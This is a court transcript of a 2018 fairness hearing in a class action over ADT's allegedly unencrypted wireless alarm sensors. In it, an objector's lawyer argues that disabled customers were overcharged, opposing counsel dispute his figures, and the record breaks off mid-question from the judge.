             Official Reporter, U.S. District Court

(Appearances continued, next page)

---

APPEARANCES, CONTINUED:

For Defendant:
                    BARTLIT BECK HERMAN PALENCHAR & SCOTT
                    54 West Hubbard Street
                    Suite 300
                    Chicago, Illinois 60610
                BY: **MARK L. LEVINE, ESQ.**
                    **DANIEL R. MCELROY, ESQ.**


For Objectors Edward and Darlene Orr:
                    BLAXTER | BLACKMAN LLP
                    475 Sansome Street
                    Suite 1850
                    San Francisco, California 94111
                BY: **STEVEN H. WINICK, ESQ.**

(Objector Edward Orr appearing telephonically)

1    **Thursday - February 1, 2018**                          **2:02 p.m.**

2                            P R O C E E D I N G S

3        **THE CLERK:**  Calling Civil Case 16-2233, Michael Edenborough,

4    et al. versus ADT LLC, et al.

5        Counsel, will you please stand and make your appearances.

6        **MR. ZIMMERMAN:**  Good afternoon, Your Honor.  Tom Zimmerman

7    for the plaintiffs and class.

8        **MR. CHAVEZ:**  Good afternoon, Your Honor.  Mark Chavez for

9    the plaintiffs.

10       **MR. BALINT:**  Good afternoon, Your Honor.  Frank Balint, also

11   for the plaintiffs.

12       **MR. LEVINE:**  Good afternoon, Your Honor.  Mark Levine for

13   defendant ADT.

14       **MR. McELROY:**  Good afternoon, Your Honor.  Dan McElroy also

15   for defendant ADT.

16       **MR. WINICK:**  And good afternoon.  Steve Winick on behalf of

17   the objectors, Edward and Darlene Orr.

18       **THE COURT:**  Mr. Winick, I'm understanding that you are

19   hoping that we will patch your clients in by phone.  Is that

20   true?

21       **MR. WINICK:**  If the Court would be amenable to that, that

22   would be great.

23       **THE COURT:**  We'll do that.  Order it right now.

24       **THE CLERK:**  Just a moment, Your Honor.

25       (A pause in the proceedings)

1        **THE CLERK:**  Mr. Orr, this is William Noble, Judge Tigar's

2    courtroom deputy.  The hearing is under way.  I'm going to allow

3    you to listen in, but your line into the court will be muted.

4        **THE COURT:**  All right.  This is Judge Tigar.  We are on the

5    record.

6        Mr. Orr, who appears through counsel today and who is

7    listening by telephone, has filed an objection to the

8    settlement.  Today the matter is on calendar for final approval.

9        Is any person who is here today other than Mr. Orr, or his

10   lawyer, here to make an objection to the settlement in this

11   case?

12       (No response)

13       **THE COURT:**  The record will reflect, first of all, there's

14   just one guy in the audience, and he didn't move.  Secondly,

15   that nobody has responded to the Court's invitation to

16   objection, so that we now know, based on the docket, what the

17   total number of objections is before the Court.

18       I have -- I had one question regarding CAFA notice.  Counsel

19   have dealt with that question and so I don't think I need to say

20   anything further about that.  I want to have a discussion with

21   counsel about the *Hyundai and Kia Fuel Economy Litigation* order

22   the Ninth Circuit issued eight days ago, nine days ago now.

23       I want to observe that in general it's best practice to

24   submit receipts for all of your significant expenses and all of

25   your travel expenses.  In this case, I'm not sure I need to do

1  that, but just as a cautionary note to counsel going forward.
2  And those are the things that are on my list.
3      Before I get to those things, perhaps I should allow
4  Mr. Winick to state in court whatever additional comments he
5  wants to make in support of Mr. Orr's objection.
6      Mr. Winick, while you are on your way to the microphone, I
7  will say on January 2nd, your client filed an objection which
8  was 70 pages long.  And the objection attached 15 exhibits,
9  which total an additional 1,321 pages in length.
10     On January 22 he filed what I think are copies of things
11  that he had already filed, but that was an additional 71 pages.
12     I can't promise that I am an expert on what material might
13  be located, for example, on Page 1209.  But I did read the main
14  objection.  And it appears to me that your client takes issue
15  with the settlement because it resolves claims related to the
16  way he feels ADT treats handicapped persons.
17     And as he, himself, recognizes on Page -- I think it's 8 of
18  his objection, those are different from the claims that we have
19  here.
20     So, it would be helpful to me if I'm misapprehending
21  Mr. Orr's objection, if you would tell me that, or -- so forth.
22     **MR. WINICK:**  Okay.  Let me start by just giving you a quick
23  introduction as to how I got here.  I'm usually on the defense
24  side of class actions.
25     **THE COURT:**  Weren't you a partner at Sheppard Mullin at one

1  point?
2      **MR. WINICK:**  I was.
3      **THE COURT:**  Yes.
4      **MR. WINICK:**  I just recently left.
5      **THE COURT:**  Okay.
6      **MR. WINICK:**  And I get a -- I get a call basically coming in
7  from the Jewish Federation of Northern California and directing
8  that I talk to Mr. Orr.  And I looked at the papers, and I saw a
9  huge submission.
10     And as anyone who has been around civil law for a very long
11  time, they see something that's that long with different font
12  and bolds and underlines, your first reaction is to run.  And I
13  couldn't make it through the submission.  I have told Mr. Orr
14  that.
15     But I picked up the phone, called him, explained to him what
16  I thought were the problems and why, probably not worth my time.
17  And we had a -- we had a long conversation.  And I started to
18  hear a very different story than I could have pulled out easily
19  from the papers.
20     And, and, had he been represented by legal counsel at the
21  very beginning, I'm sure it wouldn't have been a long
22  submission, gotten down to 15 pages, and it would have been --
23  it would have been tight.
24     My job here today is to try to give you in a very short way
25  what I now know the objection is.  And it's all in -- it's all

1  in the record. But it's --

2  **THE COURT:** Are you representing Mr. Orr on a pro bono basis

3  because the Jewish Federation thought you might do that? They

4  just called you?

5  **MR. WINICK:** Yes.

6  **THE COURT:** You take all the time you need.

7  **MR. WINICK:** So, let me start by introducing you also to

8  Mr. Orr. Mr. Orr is a handicapped gentleman, lives in -- he

9  lived in Pennsylvania. He had some problems. There was a house

10  burning. But that's not the issue in the case.

11  The issue -- he is a handicapped, he does live in a

12  wheelchair, he has limited mobility. And he is representative

13  of a class of persons that I do not believe is being treated

14  fairly and reasonably in this settlement. And it is not

15  physical damage to the case.

16  It is the fact that there were misrepresentations made --

17  same misrepresentations that we're dealing with in settling this

18  lawsuit -- that were made to the handicapped, that had extra

19  force when they went to the handicapped.

20  So let's start. I have seven, eight points. First point is

21  the class settlement does not distinguish between handicapped,

22  disabled members and anyone else. It is all persons who

23  received, basically, advertisements or received information from

24  ADT that the systems were encrypted and protected.

25  The complaints, if you look at any of the complaints, they

1  talk about that -- the foul that was motivation for this lawsuit

2  is that ADT is telling all of its potential customers that this

3  is an encrypted product, and will protect them, and they will

4  provide them protection from interference. Which is important

5  for everyone, but it's particularly important to the

6  handicapped. Particularly important to somebody whose mobility

7  is limited, when they get -- and they need protection in the

8  event of a fire. For instance, they need fire -- the station to

9  be contacted right away.

10  **THE COURT:** Your point is that because of the lack of

11  mobility, disabled persons are reasonably more fearful.

12  **MR. WINICK:** They're more --

13  **THE COURT:** When something bad happens. And so they are

14  more apt to place great reliance on a representation that a

15  security system will protect them.

16  **MR. WINICK:** Absolutely. It's intuitive; it's just common

17  sense.

18  That's the -- the first point is just that the class

19  settlement doesn't distinguish. The second point is that the

20  handicapped class would be -- subclass is more vulnerable.

21  The third point is that ADT targeted handicapped individuals

22  with advertising, touting encryption. The evidence is in the

23  record. "Special systems for the handicapped." "Totally

24  encrypted for 24-hour dependable security."

25  **THE COURT:** These are -- you say "in the record." You mean

1   these are in Mr. Orr's attachments.

2      MR. WINICK:  Yes, they are.

3      THE COURT:  I'm going to have to beg your indulgence because

4   there are at least 1,300 pages.

5      MR. WINICK:  I appreciate that.

6      THE COURT:  So they have been indexed, the Court's ECF

7   filing system.  So if you could provide me and counsel with page

8   citations, that would be helpful.

9      MR. WINICK:  Yes.

10      THE COURT:  We don't have the ECF number here, but let's say

11   the ECF number is 340.  It would be 340-something at Page

12   something or other.

13      MR. WINICK:  Okay.  So in the ECF system, document 141-1,

14   Page 84 of 115, is one of the advertisements to the handicapped.

15   It reads (As read):

16          "ADT has special systems for the handicapped, FEMA

17          approved."

18      At the next page, 85:

19          "ADT has special systems for the handicapped, totally

20          encrypted for 24-hour dependable security."

21      Page 86, the next page after that:

22          "Special systems for the handicapped."

23      These are all advertisements that are attached, in

24   existence:

25          "Totally encrypted, FEMA-approved, nationwide

1          protection from ADT."

2      On Page 87, same, same basic advertisement:

3          "Special systems for the handicapped, extra

4          protection:  $50 average monthly fee."

5      I want you to focus on "$50 average monthly fee" because

6   that's going to come in relevant later when we start talking

7   about the -- the -- whether this is -- the settlement is

8   reasonable.

9          "Sign up..."

10      THE COURT:  I know just a moment ago, I was just very taken

11   by your willingness to take this pro bono case as it came in

12   through the window.  And I said, essentially, take your time.

13      But it would be helpful to me to know how much time you

14   think you are going to take.

15      MR. WINICK:  I won't need to go through all of these

16   exhibits.  I'm certainly ready and prepared to give you

17   citations to all of the record that I think are important.  But

18   I think 15 minutes is all I'll need.

19      THE COURT:  Very good.

20      MR. WINICK:

21          "Totally encrypted for 24 hour dependable security.

22          Extra protection.  $50 average monthly fee.  Sign-up

23          and installation start at $2,000."

24      This is what they're saying to the handicapped.

25      And there's a number of other advertisements, anywhere

1  from -- on Pages 88 through 96 of Document 141-1.

2  The fourth point.  Handicapped end up paying two to three

3  times more for their systems than anyone -- than non-handicapped

4  persons.

5  So we can start with Ed Orr's own personal experience.  And

6  his own records are submitted in Document 132-5.  Page 2 of 83.

7  Document 141 on Page 77 and Document 132-5 at Page 38.

8  Ed Orr's personal experience was that he paid a 57.99

9  monthly charge and a $3,469 installation, because he wanted to

10  get a system to protect him, because he's handicapped.  And he

11  paid substantially more than an average person would.

12  (Reporter interruption)

13  **MR. WINICK:**  Mr. Orr was personally advised that if he was

14  not a handicapped person, the installation would be less than

15  1,000, with a $25 monthly fee.

16  Now, if you look to what the Court has stated in its

17  preliminary approval order, it is basing the settlement on an

18  average monthly payment of $28 for ADT customers.  This was in

19  your preliminary approval at Page 12, Line 28.

20  So he's paying 57.99.  You're basing it on a -- on an

21  average of $28.  If I go back to the advertisements that I

22  referred to a moment ago, they say "Starting at $50."

23  **THE COURT:**  I'm going to interrupt you, because you're doing

24  a good job of explaining Mr. Orr's objection.  And you're

25  providing a very useful framework which clarifies the objection

1  that he already filed.

2  But it will be helpful to me in following your presentation

3  to know what relief you think Mr. Orr is entitled to.  I can't,

4  obviously, grant any relief.  All I can do is approve a

5  settlement or not approve it.  But what do you think should have

6  happened in this case that didn't happen?

7  I'll give you some examples.  Do you think that there should

8  have been a subclass?  These lawyers perhaps cannot -- could not

9  represent such a subclass because, for the reasons that you are

10  now explaining, it's possible that their interests are

11  antagonistic to the rest of the class because persons in that

12  subclass, if there were one, might be entitled to more money

13  than other persons.

14  And in any event, the negotiations to determine that would

15  have to be conducted by lawyers representing these people who

16  have different interests.

17  But who would establish such a subclass?  Not Mr. Orr.

18  Until today, he's represented himself.  So he can't act as a

19  class lawyer in any way.

20  Is it that -- I guess I need to know -- let's say, when

21  someone objection to a settlement, what they're saying is:  I

22  want the Court to reject the settlement.

23  If I did reject the settlement, what I would give as my

24  reason?

25  **MR. WINICK:**  If you -- and it's a very good question.  And I

1  couldn't make a deal on behalf of Mr. Orr's interests today
2  anyways.  But -- and so --
3      THE COURT:  I'm not trying to negotiate with you.  We're at
4  the $100 table now.
5      MR. WINICK:  Yes, I appreciate it.
6      THE COURT:  If I issue the order your client wants me to
7  issue, what would it say?
8      MR. WINICK:  The order would say that class certification is
9  denied because the -- the class representatives are not typical
10  of the handicapped-disabled members.
11      And when I get to the numbers in a moment, you'll get to the
12  second conclusion, which is that the settlement is not fair,
13  reasonable, or adequate.
14      I mean, as -- prior to class certification, as you've
15  recognized, a court should apply a higher standard.  And the
16  individual awards of $15 and $45 --
17      THE COURT:  I got it.
18      MR. WINICK:  -- which is not, from our perspective, remotely
19  reasonable --
20      THE COURT:  I saw you heading in that direction before,
21  about how the amount of compensation for the persons who paid
22  the fees that you were describing are inadequate.  I saw that
23  argument coming.
24      But your other argument is that there's not adequate
25  typicality, or maybe even commonality.

1      MR. WINICK:  Sure.
2      THE COURT:  And so -- okay.  Go ahead.
3      MR. WINICK:  And, and, so --
4      THE COURT:  And I will say, actually, to Mr. Orr's credit,
5  he makes a commonality argument in his objection.  It's not as
6  easy to follow as your presentation, but he made the objection.
7      MR. WINICK:  This is exactly the point.  I looked at these
8  papers when I first got it, and I was thinking that I was going
9  to call him up and politely decline.  And we started to talk.
10  And I realized he had all of the elements there.
11      THE COURT:  Yeah.  Anyway, go ahead.
12      MR. WINICK:  All right.  So I was saying as my fifth point,
13  that handicapped are paying two to three times more for their
14  systems.  I started by identifying what Mr. Orr personally paid.
15      I also wanted to compare that to the -- to what the Court
16  had already found, which was based on submissions by counsel,
17  that $28 was the average monthly payment.  No mention of what
18  the installation payment would be.  But the sign -- as set forth
19  in these advertisements, the sign-up and installation for a
20  handicapped system starts at $2,000, and it begins with a
21  $50 average monthly fee.
22      Now, the installation fee is also particularly high.  And
23  it's higher for a handicapped system, partially because they are
24  more vulnerable, probably because they may need a more secure
25  system.  In there, in their own materials, ADT -- well,

1  actually, it's -- in materials about ADT, there's a report that
2  says that their average install -- high install fee is $650.
3  And I'll get you the cite for that.  So we're looking at $2,000,
4  and now $650.  And that is -- upside-down -- Document 141, Page
5  85 of 98.
6      So we've got -- $650 is a high average, is the average, but
7  for the high installation fee.  And the handicapped systems
8  begin at $2,000.
9      The next point is 6, which is that handicapped would not
10  have purchased, had they known that the systems were vulnerable
11  for disruption.  And, and I don't have anything -- any clear
12  evidence on this point.
13      I also don't have any -- there is no clear evidence in the
14  record from anyone else that says -- that could support the idea
15  that the handicapped would have purchased these, anyways.
16      Mr. Orr will tell you that he would never have purchased a
17  system that he knew was vulnerable.  In fact, he had personal
18  problems, himself.  You're in a wheelchair.  You find out you
19  spent a lot of extra money for a system because you're
20  vulnerable.  You're being told that this system is unencrypted,
21  and it's going protect you.
22      And we can look at all sorts of ADT --
23      **THE COURT:**  Does the argument beg the question of whether
24  the customer, nonetheless, received some value from the system?
25      **MR. WINICK:**  Well, I was thinking more --

1      **THE COURT:**  I see -- are you going to the point of:  We
2  think that all the money has to be given back, that's the value
3  of the claim?
4      And if that's where you're going my question would be:
5  Well, are you required -- I'm not expressing an opinion, I'm
6  asking the question:  Are you required to ask whether they
7  received value from the system?
8      **MR. WINICK:**  Sure.  I think that that's fair.  But if you're
9  class counsel in this context, I think that you should be asking
10  the question which is whether or not the handicapped would have
11  been purchasing these products.
12      And, and it should have been based on -- on something more
13  -- more than a -- some sort of a declaration that we couldn't
14  prove this point in the trial.  And there's not any attempt to
15  sift out for the handicapped subclass.
16      So now let me shift to No. 7, which is:  The revenue that
17  ADT gained from handicapped was very significant.
18      So what we know is that the class size is 3 1/2 to 4 million
19  people.  That's from the Zimmerman declaration.
20      We -- we don't know exactly of the 3, 3 1/2 to 4 million
21  people, how many were handicapped.  We don't know that.  We know
22  that ADT was advertising to handicapped people.  We know a
23  couple of different things.
24      **THE COURT:**  Can I ask you a question?
25      **MR. WINICK:**  Yes.

1     **THE COURT:** Do you think right now, if we wanted figure on
2     that question out, we could get the answer?  In some
3     economically rational way?
4     **MR. WINICK:** I would think that ADT knows this answer.  I
5     would think that they would know who, who -- which of their
6     customers bought handicapped systems.
7     **THE COURT:** Oh, that's right, because there's a designation
8     of their -- they have separate marketing materials for
9     handicapped systems.
10    **MR. WINICK:** I believe so.
11    **THE COURT:** Okay.  Okay.
12    **MR. WINICK:** But, but I can tell you a couple of different
13    things about the handicapped population.
14    Number one is, at Document 141 at Page 35, there's a study
15    from the University of New Hampshire 2016 Disability Statistics
16    Report, that says that 12.6 percent of the United States is
17    disabled.
18    And the Census Department, which is Document 141-1 at Page
19    20, estimates it at 19 percent.
20    Twelve point six, 19 percent.  Let's assume 10 percent.
21    Let's assume that 10 percent of the 3 1/2 to 4 million persons
22    in the class are disabled.  350- to 400,000 persons.
23    Now, the installation costs for the handicapped, for the
24    340- to 400,000 handicapped are going to be significantly higher
25    than they were for the others.  Based on the information I have

1     already told you, a conservative estimate would be $1,500 more.
2     As I say, starting at 2000 for the handicapped, and they say
3     basically that the high install fee was $650.  So I'm saying
4     1500.  Note that Mr. Orr had 3,469, installation.
5     This translates to, just for the installation, 525 million
6     to $600 million.
7     Now, there may have been some value that they got from this,
8     this program.  But the numbers are 500 and --
9     **THE COURT:** How do you -- oh, hang on a second.
10    (The Court performs calculation)
11    **THE COURT:** I was doing my own math, but I forgot a zero.
12    Go ahead.
13    **MR. WINICK:** The number is staggering when you compare that
14    to the settlement value.
15    **THE COURT:** Say your number again.
16    **MR. WINICK:** Okay.
17    **THE COURT:** You have some, hundreds of millions of dollars?
18    **MR. WINICK:** 350- to $400,000, handicapped.  Right?
19    **THE COURT:** People, not dollars, but yes, that's right.
20    That's what you said.
21    **MR. WINICK:** I'm estimating that they pay at least $1,500
22    more.
23    **THE COURT:** Right.  What was your total?
24    **MR. WINICK:** 350 -- I'm sorry, 525 million to 600 million.
25    **THE COURT:** Well 3,500 times 2,000, unless my math is

1  grossly in error --

2  **MR. WINICK:**  It's not 3,500.  350,000.  There's a class of

3  3.5 million.

4  **THE COURT:**  Yes.

5  **MR. WINICK:**  Ten percent of that would be 350,000.

6  **THE COURT:**  Yes.  You're right.  Okay.

7  **MR. WINICK:**  So that translates to 525- to $600 million on

8  what they get in addition just from the handicapped -- this is

9  just on the additional bit.  I didn't take into account the base

10  number.  I said that they were paying $1,500 more.  So the ADT

11  received about 525 to 600 million more for handicapped programs

12  than if they had just sold them the normal programs.

13      In addition, monthly fees were at least $25 more for the

14  handicapped.  You've got -- they're starting at $50 services,

15  based on their own advertisements.  You estimated it basically

16  $25.  It's $25 more for the handicapped annually.

17      If you just -- you would say all they did was hold the

18  system for one year, and never anything more, that would be

19  another 105 to $120 million just on monthly fees.  And I bet you

20  that ADT will tell you that it has data that says that people

21  keep a program for longer than a year.

22      So let's compare that to the payments to the handicappeds in

23  this case.  So $16 million value of the settlement.  That's it.

24  Ten percent -- remember, we're still using the 10 percent number

25  for the handicapped, $1.6 million value to the handicapped.

1  Compared to additional revenues of 525 million and increased

2  annual fees of 105 million.

3      That's the extent of my -- the factual presentation that I

4  can make for you today, but I think that from that, and given

5  the evidence that's been presented to you, you can reach the

6  conclusion that the settlement is not fair, reasonable, or

7  adequate, and that the class representatives are not typical of

8  the handicapped, disabled members.

9      **THE COURT:**  Well --

10      **MR. WINICK:**  What's particularly missing from the evidence

11  that class counsel and defendants have given you?  One, there's

12  no mention that they even attempted to evaluate handicapped

13  members' claims.

14      Secondly, they never attempted to evaluate profits and

15  revenues that were enjoyed by ADT from handicapped members.  It

16  doesn't appear that they looked at this analysis at all.

17      And I don't believe that they evaluated whether or not

18  ADT -- whether or not the handicapped members would even have

19  purchased the system, given their vulnerability, had they known

20  that the systems were subject to lots of problems.

21      Now, one argument that has been made by -- to me by the

22  plaintiffs' counsel and is also in, I think, one of the reply

23  briefs, is that they're not attempting to resolve the issues

24  that Mr. Orr has.

25      Now, I would agree with them, if Mr. Orr's -- if my

1   presentation was focused on property damage, I would agree with
2   you.  Because the -- the settlement does not attempt to resolve
3   property damage.

4       THE COURT:  I'm going to cut you short, because I have a
5   feeling that counsel for the parties are hearing many of these
6   things for the first time, and they need an opportunity to
7   respond at the microphone.

8       So, but I'm interrupting just because I think I know where
9   you're going, which is to say that your client's claims are
10  being extinguished by the settlement --

11      MR. WINICK:  Absolutely.

12      THE COURT:  -- because -- because the representations to
13  handicapped claims about the integrity of these wireless
14  security systems are not peeled or segregated in any way.  And
15  so as to those persons, your contention is that the settlement
16  is not fair, reasonable or adequate.

17      And because of the number of persons that are likely to be
18  disabled, customers of ADT, this is not simply a situation where
19  one or two or five people could have simply objected and opted
20  out of the settlement -- I should have said "opted out" -- could
21  have simply opted out.  There is a whole category of persons
22  here --

23      MR. WINICK:  Absolutely.

24      THE COURT:  -- that you think are not treated well enough.

25      MR. WINICK:  Thank you.

1       THE COURT:  Okay.  So --

2       MR. WINICK:  That's all I have.

3       THE COURT:  Very good.  Well, I will say there is a
4   significant delta between Mr. Orr's written presentation and his
5   in-court presentation, which I now understand a lot better.

6       Thank you.

7       Let me hear from plaintiffs' counsel.

8       MR. CHAVEZ:  Your Honor, Mark Chavez for the plaintiffs.

9       I want to make one point and then turn to ADT because I
10  think that there are -- first of all, I appreciate Mr. Winick's
11  situation, stepping into this matter late, trying to assimilate
12  the facts and trying to digest them for the Court.

13      However, as I think ADT is going to tell you very shortly, a
14  number of the factual assertions that Mr. Winick made and a
15  number of the projections with respect to revenue generated and
16  virtually every other number that was put on the table simply
17  are not accurate.

18      In this situation, Your Honor, I have personally had
19  experience prosecuting cases under the ADA and California's laws
20  protecting the disabled.  I served for ten years on the Board of
21  Disability Rights Advocates.

22      The question, I think, at the core here is:  What is the
23  legal claim that he's saying exists for disabled persons that
24  he's seeking to vindicate?  Because I don't know of one.

25      The non-discrimination provisions of federal and state law

1   and the equal-access provisions that exist under federal and

2   state law don't give rise to any claim that I see that exists

3   distinctly in a group of disabled persons.

4       And the argument that I think what -- that at its core, what

5   they're trying -- the argument they are trying to make is that

6   we should have divided the class up into segments, based on

7   particular vulnerabilities.

8       **THE COURT:** Well, I think there are two different arguments.

9   And this isn't the way Mr. Winick made them --

10      **MR. CHAVEZ:** Uh-huh.

11      **THE COURT:** -- but it's the way that I heard them. And

12  obviously, I'm getting this information on a pop-quiz basis. I

13  didn't know any of this was going happen today.

14      **MR. CHAVEZ:** Yes.

15      **THE COURT:** And so nothing that I want to say now is either

16  remotely final, or even particularly well-informed.

17      But I heard two things: One is an emotional-distress

18  argument that I'm not sure has any legs. These -- it bothered

19  us much more when we found out that these systems were

20  vulnerable because we are vulnerable.

21      It's not that the argument doesn't have a lot of emotional

22  force. It does. But I just didn't -- I'm not sure it has any

23  legal force.

24      The other issue is more interesting. And that is: In a

25  settlement where I have already expressed some concerns about

1   whether there was an adequate evidentiary basis to support the

2   amount of the settlement, Mr. Winick is putting in front of

3   me -- admittedly, from the podium, although he has indicated

4   it's in the written materials that Mr. Orr submitted -- numbers

5   that would suggest a very large revenue stream to ADT that is a

6   lot larger than the revenue stream for non-disabled customers.

7       And that potentially creates an interesting intra-class

8   conflict issue.

9       **MR. CHAVEZ:** If true, Your Honor. And I want to emphasize

10  that "If true." Because I don't think that's correct. I think

11  that his argument is based upon erroneous factual premises which

12  I am going to let ADT address (Indicating).

13      However, with respect to the emotional-vulnerability issue,

14  there are people in the class who have been robbed before.

15  There are people in the class who are single mothers. There are

16  people in the class who have particular feelings of

17  vulnerability because of incidents in their past. And I don't

18  see how we could treat those people differently based upon some

19  subjective feelings of vulnerability.

20      And now I am going to let ADT address the numbers, because I

21  don't think they're accurate at all.

22      **MR. LEVINE:** Your Honor, again, Mark Levine for ADT. I'm

23  not going to address the emotional -- what you called the

24  emotional-distress argument. I want to focus on this notion

25  that ADT has a separate kind of alarm -- intrusion system for

1    disabled people than non-disabled people.

2        It's just not right.  There is no such thing.

3        **THE COURT:**  Well, even if it's not as -- Mr. Winick, I

4    think, although he described it as separate system, was, I

5    think, referring to a different fee structure.

6        So the question is:  If there's not a separate system, might

7    it be that there's the same system, but there are higher

8    installation or monthly fees?

9        **MR. LEVINE:**  No.  It's not right.  And here's why.

10       What Mr. Winick has done -- and again, you know, I

11   understand he's getting limited information, he doesn't have the

12   full array of information before him.

13       What he's done is kind of a classic logical fallacy:  Here's

14   an average, this person (Indicating) pays more than the average

15   and this person's handicapped.  Therefore, he's paying more

16   because he's handicapped.

17       And that doesn't work.  Because if you look at the

18   contract -- and one page -- I think I saw in the materials that

19   Mr. Orr submitted, you know, the voluminous materials, there was

20   the first page of the contract, though not necessarily the whole

21   thing.  I have the whole thing, and we can submit that.

22       But the whole contract shows that in addition to a large

23   number of sensors at his home -- and the number of sensors will

24   affect the installation cost.  The more sensors you have the

25   higher the installation cost.  He's got four door sensors, three

1    window sensors, three motion detectors, and others.

2        But that's -- the most significant thing is he has the pulse

3    system.  The pulse system -- and you may have seen this

4    advertised -- involves using video cameras, having video cameras

5    around the house, so that with your -- you can log in.

6        Let's say you're outside of the house.  You can log in on

7    your computer, or on your cell phone, and watch what's going on

8    with the video cameras.

9        Well, video cameras cost money.  So if you're paying for a

10   system with three video cameras and a separate panel for the

11   hub, so to speak, for the video cameras, it costs a lot more.

12   And you're paying more per month because you're running not just

13   the alarm system and the -- The $29 average cost, by the way,

14   that is the cost of the alarm, the intrusion detection, not

15   other extras you can add on.

16       You know, so, he, Mr. Orr has a number of extras, but most

17   significantly he has Pulse.  It says:  Pulse is included in that

18   57.99 per month.  That's the video system which costs a lot

19   more.  So, of course he's paying more, because he has the video.

20   The video is not part of this case.  It's not part of the claims

21   in this case.

22       So that's the answer, Your Honor.

23       One -- a couple of other quick points.  One is when you

24   think about it, you know, this whole point about, you know, no

25   different system, this case is about statements that were made,

1    or omissions allegedly not made about the wireless signal

2    between a door sensor or a window sensor, the thing that tells

3    you if the door's been opened or the window's been opened, and

4    the alarm panel that you have in the base somewhere --

5        **THE COURT:** Mr. Levine?

6        **MR. LEVINE:** Yeah.

7        **THE COURT:** Could you slow down just a tad?

8        **MR. LEVINE:** I'm sorry, what?

9        **THE COURT:** Could you slow down just a tad?

10       **MR. LEVINE:** Yeah, I will.  Sorry about that, Your Honor.

11       **THE COURT:** Thank you.

12       **MR. LEVINE:** So the door sensors that open up or the windows

13   that, you know, tell you if a window's opened up.  And then it

14   connects, sometimes with wires, sometimes wireless, to an alarm

15   panel that's typically in the basement or in a closet.

16       And this case relates to that wireless connection.  And

17   whether the signals are secure.  Well, the door sensors and the

18   window sensors aren't any different for someone who's

19   handicapped or someone who is not handicapped.  It's the same

20   door sensor, the same window sensor.  Sometimes they're

21   wireless, sometimes they're wired, depending on what people

22   want.

23       But contrary to what Mr. Winick says, ADT does not have some

24   kind of special notation saying:  Well, here are our handicapped

25   people, and here are non-handicapped.  It doesn't tell you.  And

1    it doesn't relate to the door and window sensors.

2        **THE COURT:** Can I ask you a question?

3        **MR. LEVINE:** Yes, sir.

4        **THE COURT:** In his presentation, Mr. Winick said -- or it

5    seemed to me he said that there are marketing materials directed

6    to -- marketing materials that ADT put out that are directed, on

7    their face, to disabled potential customers.

8        If I read the materials for which he provided page

9    citations, do you think I will conclude that I was mistaken in

10   my interpretation of his remarks?

11       **MR. LEVINE:** I think when you read it, you'll conclude that

12   it's not clear what those materials are.  And I'll give you an

13   example.  Page -- one of the pages that --

14       **THE COURT:** Well, let's freeze right there for a moment.

15   Because as I'm taking in this information, one of the things I'm

16   thinking is:  What am I going to do next?

17       And I -- I have been surprised -- pleasantly, in some ways,

18   because of course it's nice to lead a life that isn't filled

19   with boring redundancy -- but I was surprised by the complexity

20   and density of the objection that I received today.

21       It also seems to me that Mr. Orr may exercise his right to

22   seek appellate review of whatsoever decision I make.  And so

23   it's important that whatever decision I make be not only

24   correct, but sufficiently well-supported that a reviewing court

25   can look at the decision and determine for itself whether it was

1  correctly made and adequately supported.

2      So far what I have is: A difficult-to read but quite prolix

3  objection, and a presentation in court that was pretty good by

4  the objector's new lawyer.

5      So as I'm taking this information, I'm trying to think:

6  What are the obligations on me, as the judge, who sits as a

7  quasi-fiduciary for the class? Should I give Mr. Winick a

8  chance to put in something that summarizes in writing the

9  presentation that he made today? Will the lawyers for the

10  parties think, oh, now I'm embroiled, and I have stepped in and

11  I have given the objector an additional chance to put his oar in

12  the water that he didn't have? But if I don't do that, how am I

13  going to decide this issue? I have now had my attention

14  directed to specific exhibits within the objector's materials

15  that are supposed to be helpful.

16      So if I ask you: Is it going to show this? And you say:

17  Well, if you look at that, it's not going to be not clear, "not

18  clear" is not good for me.

19      MR. LEVINE:  I guess --

20      THE COURT:  Let me finish.

21      MR. LEVINE:  Sorry, Your Honor.

22      THE COURT:  If all the parties leave me with at the end of

23  this process is: You go back in chambers and you figure it out,

24  and then you sign an order that is likely to be appealed, I'll

25  do it. But I'm looking for clarity.

1      MR. LEVINE:  Let me respond to that, Your Honor.

2      First thing is that the pages, on their face, are not ADT

3  marketing brochures or ADT marketing literature. It appears to

4  be something from Facebook, because it says "Like this page."

5  And then -- I know that that's something that you do on

6  Facebook, at least that is what I'm told. And it has several

7  different lines that are not related to one another.

8      So there's a line that refers to the Steffens Family

9  Lifesaver Event, which are some people who were saved from a

10  fire, like from a fire by a fire alarm that is advertised by

11  ADT. There is a line for "ADT has special systems for the

12  handicapped." Doesn't say what it is.

13      The only thing that -- that's what Mr. Winick was referring

14  to. The only type of system that is on the ADT website that

15  could possibly be relevant is marketed to seniors, which is the

16  alerts if you fall or if you have a medical issue, some medical

17  alert material that ADT provides.

18      But there is no -- but again, bringing it back to this case,

19  this case is about intrusion sensors. Like door sensors and

20  window sensors. And there are no special systems like that.

21  And we could submit something to that effect if you want.

22      The reference to encryption is below that, and doesn't say

23  it's encryption of wireless. In fact, there is encryption of

24  the communication with ADT.

25      So what you have is some blurb from Facebook that refers --

1   that ADT doesn't -- marketing folks don't show as being theirs,

2   that refers to handicapped in some way.  That's not enough to

3   show what Mr. Winick said, that there is some special

4   handicapped intrusion system with door and window sensors --

5   **THE COURT:**  Is there a written response -- I beg your

6   pardon.

7   Is there a written response to the Orr objection on the

8   docket?

9   **MR. BALINT:**  Yes, there is, Your Honor.

10  **MR. McELROY:**  Plaintiffs -- (Inaudible)

11  **MR. BALINT:**  Mr. Balint, Your Honor.

12  And we did file a response to Mr. Orr's objection.  And in

13  that response, we, I thought, addressed the very question

14  Your Honor has just asked.  And that is:  What is the scope of

15  the Court's responsibility today, right here?

16  And that is to determine whether the release is overbroad.

17  **THE COURT:**  Mr. Balint?

18  **MR. BALINT:**  Yes, Your Honor.

19  **THE COURT:**  I'm going let Mr. Levine finish.  But before I

20  do that, can you give me the docket number for that?

21  And I apologize for not having read it before I took the

22  bench.

23  **MR. BALINT:**  It is 139.

24  **MR. CHAVEZ:**  It is 139.

25  **MR. BALINT:**  Thank you.  139.

1   (A pause in the proceedings)

2   **THE COURT:**  All right.  Well, again, that is a document that

3   I should have read before I took the bench today.  And I'll read

4   it as soon as I get off the bench.

5   Mr. Levine, let me ask you a question that may obviate the

6   need for some of the proceedings.

7   The plaintiffs in their supplemental brief state on numbered

8   Page 5, which I think is ECF Page 6, that the proposed

9   settlement class release does not release the claims, the

10  special claims of people like Mr. Orr.  And it says that at

11  roughly Lines 21 through the end of that page.

12  And my question is, on the record, whether ADT agrees that

